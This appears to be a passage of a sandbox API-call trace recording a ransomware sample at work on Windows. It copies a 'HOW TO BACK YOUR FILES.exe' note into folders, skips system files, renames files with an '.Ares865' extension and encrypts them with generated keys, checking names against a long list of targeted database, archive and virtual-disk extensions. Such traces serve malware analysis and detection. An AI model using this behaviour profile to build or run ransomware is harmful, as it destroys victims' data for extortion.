returned 0x2e7a50 [0115.120] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 0 [0115.120] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0115.120] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0115.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget" [0115.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0115.121] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget") returned 61 [0115.121] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget" [0115.121] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0115.121] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\how to back your files.exe"), bFailIfExists=1) returned 0 [0115.121] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0115.122] GetLastError () returned 0x0 [0115.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0115.122] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0115.122] CloseHandle (hObject=0x120) returned 1 [0115.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0115.122] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0115.122] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0115.122] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.122] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0115.122] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0115.122] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51cf1c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.122] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.122] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0115.122] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0115.122] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0115.123] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf39e8c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf39e8c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd379e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3260, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="aoldtz.exe") returned 1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2=".") returned 1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="..") returned 1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="windows") returned -1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="bootmgr") returned 1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="temp") returned -1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="pagefile.sys") returned -1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="boot") returned 1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="ids.txt") returned -1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="ntuser.dat") returned -1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="perflogs") returned -1 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2="MSBuild") returned -1 [0115.123] lstrlenW (lpString="drag.png") returned 8 [0115.123] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*") returned 63 [0115.123] lstrcpyW (in: lpString1=0x2cce47c, lpString2="drag.png" | out: lpString1="drag.png") returned="drag.png" [0115.123] lstrlenW (lpString="drag.png") returned 8 [0115.123] lstrlenW (lpString="Ares865") returned 7 [0115.123] lstrcmpiW (lpString1="rag.png", lpString2="Ares865") returned 1 [0115.123] lstrlenW (lpString=".dll") returned 4 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2=".dll") returned 1 [0115.123] lstrlenW (lpString=".lnk") returned 4 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2=".lnk") returned 1 [0115.123] lstrlenW (lpString=".ini") returned 4 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2=".ini") returned 1 [0115.123] lstrlenW (lpString=".sys") returned 4 [0115.123] lstrcmpiW (lpString1="drag.png", lpString2=".sys") returned 1 [0115.123] lstrlenW (lpString="drag.png") returned 8 [0115.124] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.Ares865") returned 78 [0115.124] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0115.126] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.126] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12896) returned 1 [0115.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.126] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.127] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.127] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.127] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3560, lpName=0x0) returned 0x170 [0115.132] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3560) returned 0x190000 [0115.154] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.175] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.176] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.179] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.198] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.203] CloseHandle (hObject=0x170) returned 1 [0115.204] CloseHandle (hObject=0x118) returned 1 [0115.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.207] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.211] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x51d64020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51d64020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0115.212] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.213] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0115.214] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0115.215] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0115.216] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0115.216] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0115.217] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0115.218] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0115.218] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0115.219] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0115.220] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0115.222] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0115.224] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0115.224] lstrlenW (lpString="en-US") returned 5 [0115.225] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png") returned 70 [0115.225] lstrcpyW (in: lpString1=0x2cce47c, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0115.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0115.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9eb0 [0115.227] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0115.227] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51cf1c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x51cf1c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0115.227] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0115.227] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd6739fc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbd6739fc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbd6739fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x32a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="aoldtz.exe") returned 1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2=".") returned 1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="..") returned 1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="windows") returned -1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="bootmgr") returned 1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="temp") returned -1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="pagefile.sys") returned -1 [0115.227] lstrcmpiW (lpString1="icon.png", lpString2="boot") returned 1 [0115.228] lstrcmpiW (lpString1="icon.png", lpString2="ids.txt") returned -1 [0115.230] lstrcmpiW (lpString1="icon.png", lpString2="ntuser.dat") returned -1 [0115.233] lstrcmpiW (lpString1="icon.png", lpString2="perflogs") returned -1 [0115.233] lstrcmpiW (lpString1="icon.png", lpString2="MSBuild") returned -1 [0115.233] lstrlenW (lpString="icon.png") returned 8 [0115.233] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US") returned 67 [0115.233] lstrcpyW (in: lpString1=0x2cce47c, lpString2="icon.png" | out: lpString1="icon.png") returned="icon.png" [0115.233] lstrlenW (lpString="icon.png") returned 8 [0115.233] lstrlenW (lpString="Ares865") returned 7 [0115.233] lstrcmpiW (lpString1="con.png", lpString2="Ares865") returned 1 [0115.233] lstrlenW (lpString=".dll") returned 4 [0115.233] lstrcmpiW (lpString1="icon.png", lpString2=".dll") returned 1 [0115.233] lstrlenW (lpString=".lnk") returned 4 [0115.233] lstrcmpiW (lpString1="icon.png", lpString2=".lnk") returned 1 [0115.233] lstrlenW (lpString=".ini") returned 4 [0115.233] lstrcmpiW (lpString1="icon.png", lpString2=".ini") returned 1 [0115.233] lstrlenW (lpString=".sys") returned 4 [0115.233] lstrcmpiW (lpString1="icon.png", lpString2=".sys") returned 1 [0115.233] lstrlenW (lpString="icon.png") returned 8 [0115.233] lstrlenW (lpString="bak") returned 3 [0115.233] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0115.233] lstrlenW (lpString="ba_") returned 3 [0115.233] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0115.233] lstrlenW (lpString="dbb") returned 3 [0115.233] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0115.234] lstrlenW (lpString="vmdk") returned 4 [0115.235] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0115.235] lstrlenW (lpString="rar") returned 3 [0115.237] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0115.238] lstrlenW (lpString="zip") returned 3 [0115.238] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0115.238] lstrlenW (lpString="tgz") returned 3 [0115.238] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0115.238] lstrlenW (lpString="vbox") returned 4 [0115.238] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0115.240] lstrlenW (lpString="vdi") returned 3 [0115.240] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0115.241] lstrlenW (lpString="vhd") returned 3 [0115.242] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0115.243] lstrlenW (lpString="vhdx") returned 4 [0115.245] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0115.246] lstrlenW (lpString="avhd") returned 4 [0115.247] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0115.248] lstrlenW (lpString="db") returned 2 [0115.249] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0115.249] lstrlenW (lpString="db2") returned 3 [0115.250] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0115.251] lstrlenW (lpString="db3") returned 3 [0115.252] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0115.253] lstrlenW (lpString="dbf") returned 3 [0115.254] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0115.254] lstrlenW (lpString="mdf") returned 3 [0115.254] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0115.255] lstrlenW (lpString="mdb") returned 3 [0115.256] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0115.256] lstrlenW (lpString="sql") returned 3 [0115.257] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0115.259] lstrlenW (lpString="sqlite") returned 6 [0115.259] lstrcmpiW (lpString1="on.png", lpString2="sqlite") returned -1 [0115.261] lstrlenW (lpString="sqlite3") returned 7 [0115.262] lstrcmpiW (lpString1="con.png", lpString2="sqlite3") returned -1 [0115.262] lstrlenW (lpString="sqlitedb") returned 8 [0115.263] lstrlenW (lpString="xml") returned 3 [0115.264] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0115.265] lstrlenW (lpString="$er") returned 3 [0115.266] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0115.266] lstrlenW (lpString="4dd") returned 3 [0115.266] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0115.266] lstrlenW (lpString="4dl") returned 3 [0115.266] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0115.267] lstrlenW (lpString="^^^") returned 3 [0115.267] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0115.268] lstrlenW (lpString="abs") returned 3 [0115.269] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0115.269] lstrlenW (lpString="abx") returned 3 [0115.270] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0115.271] lstrlenW (lpString="accdb") returned 5 [0115.271] lstrcmpiW (lpString1="n.png", lpString2="accdb") returned 1 [0115.272] lstrlenW (lpString="accdc") returned 5 [0115.272] lstrcmpiW (lpString1="n.png", lpString2="accdc") returned 1 [0115.274] lstrlenW (lpString="accde") returned 5 [0115.275] lstrcmpiW (lpString1="n.png", lpString2="accde") returned 1 [0115.276] lstrlenW (lpString="accdr") returned 5 [0115.277] lstrcmpiW (lpString1="n.png", lpString2="accdr") returned 1 [0115.278] lstrlenW (lpString="accdt") returned 5 [0115.279] lstrcmpiW (lpString1="n.png", lpString2="accdt") returned 1 [0115.279] lstrlenW (lpString="accdw") returned 5 [0115.279] lstrcmpiW (lpString1="n.png", lpString2="accdw") returned 1 [0115.279] lstrlenW (lpString="accft") returned 5 [0115.280] lstrcmpiW (lpString1="n.png", lpString2="accft") returned 1 [0115.281] lstrlenW (lpString="adb") returned 3 [0115.281] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.282] lstrlenW (lpString="adb") returned 3 [0115.283] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.285] lstrlenW (lpString="ade") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0115.285] lstrlenW (lpString="adf") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0115.285] lstrlenW (lpString="adn") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0115.285] lstrlenW (lpString="adp") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0115.285] lstrlenW (lpString="alf") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0115.285] lstrlenW (lpString="ask") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0115.285] lstrlenW (lpString="btr") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0115.285] lstrlenW (lpString="cat") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0115.285] lstrlenW (lpString="cdb") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0115.285] lstrlenW (lpString="ckp") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0115.285] lstrlenW (lpString="cma") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0115.285] lstrlenW (lpString="cpd") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0115.285] lstrlenW (lpString="dacpac") returned 6 [0115.285] lstrcmpiW (lpString1="on.png", lpString2="dacpac") returned 1 [0115.285] lstrlenW (lpString="dad") returned 3 [0115.285] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0115.286] lstrlenW (lpString="dadiagrams") returned 10 [0115.286] lstrlenW (lpString="daschema") returned 8 [0115.286] lstrlenW (lpString="db-journal") returned 10 [0115.286] lstrlenW (lpString="db-shm") returned 6 [0115.286] lstrcmpiW (lpString1="on.png", lpString2="db-shm") returned 1 [0115.286] lstrlenW (lpString="db-wal") returned 6 [0115.286] lstrcmpiW (lpString1="on.png", lpString2="db-wal") returned 1 [0115.286] lstrlenW (lpString="dbc") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0115.286] lstrlenW (lpString="dbs") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0115.286] lstrlenW (lpString="dbt") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0115.286] lstrlenW (lpString="dbv") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0115.286] lstrlenW (lpString="dbx") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0115.286] lstrlenW (lpString="dcb") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0115.286] lstrlenW (lpString="dct") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0115.286] lstrlenW (lpString="dcx") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0115.286] lstrlenW (lpString="ddl") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0115.286] lstrlenW (lpString="dlis") returned 4 [0115.286] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0115.286] lstrlenW (lpString="dp1") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0115.286] lstrlenW (lpString="dqy") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0115.286] lstrlenW (lpString="dsk") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0115.286] lstrlenW (lpString="dsn") returned 3 [0115.286] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0115.287] lstrlenW (lpString="dtsx") returned 4 [0115.287] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0115.287] lstrlenW (lpString="dxl") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0115.287] lstrlenW (lpString="eco") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0115.287] lstrlenW (lpString="ecx") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0115.287] lstrlenW (lpString="edb") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0115.287] lstrlenW (lpString="epim") returned 4 [0115.287] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0115.287] lstrlenW (lpString="fcd") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0115.287] lstrlenW (lpString="fdb") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0115.287] lstrlenW (lpString="fic") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0115.287] lstrlenW (lpString="flexolibrary") returned 12 [0115.287] lstrlenW (lpString="fm5") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0115.287] lstrlenW (lpString="fmp") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0115.287] lstrlenW (lpString="fmp12") returned 5 [0115.287] lstrcmpiW (lpString1="n.png", lpString2="fmp12") returned 1 [0115.287] lstrlenW (lpString="fmpsl") returned 5 [0115.287] lstrcmpiW (lpString1="n.png", lpString2="fmpsl") returned 1 [0115.287] lstrlenW (lpString="fol") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0115.287] lstrlenW (lpString="fp3") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0115.287] lstrlenW (lpString="fp4") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0115.287] lstrlenW (lpString="fp5") returned 3 [0115.287] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0115.288] lstrlenW (lpString="fp7") returned 3 [0115.288] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0115.288] lstrlenW (lpString="fpt") returned 3 [0115.288] 